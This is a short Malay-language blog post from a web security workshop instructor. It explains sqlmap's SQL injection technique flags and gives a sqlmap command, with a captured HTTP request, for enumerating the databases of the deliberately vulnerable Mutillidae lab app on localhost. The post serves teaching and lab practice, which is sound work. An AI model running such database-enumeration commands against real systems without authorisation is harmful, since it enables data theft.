#30 - SQLmap & Mutillidae
2 minggu lepas ada buat workshop Web Application Security di Thimpu, Bhutan (kerjasama dengan BtCIRT)
Untuk lab SQL injection, saya dapati sqlmap ambil masa yang agak lama untuk scan database Mutillidae. Rupa-rupanya arahan default (parameter –technique) perlu diubah sedikit. Defaultnya adalah BEUST
-
B: Boolean-based blind SQL injection
-
E: Error-based SQL injection
-
U: UNION query SQL injection
-
S: Stacked queries SQL injection
-
T: Time-based blind SQL injection
sqlmap -r request.txt -p username –dbms=mysql -o –threads=10 –technique=BEUS –dbs
Nota: request.txt mengandugi URL & parameter yang boleh disql-inject, boleh dicapture oleh Zap Proxy
GET [http://localhost/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details](http://localhost/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details) HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8Accept-Language: en-US,en;q=0.5Referer: [http://localhost/mutillidae/index.php?page=user-info.php](http://localhost/mutillidae/index.php?page=user-info.php)Connection: keep-aliveCookie: showhints=1; PHPSESSID=r8mv7ultidjmnndr25al8mqosiUpgrade-Insecure-Requests: 1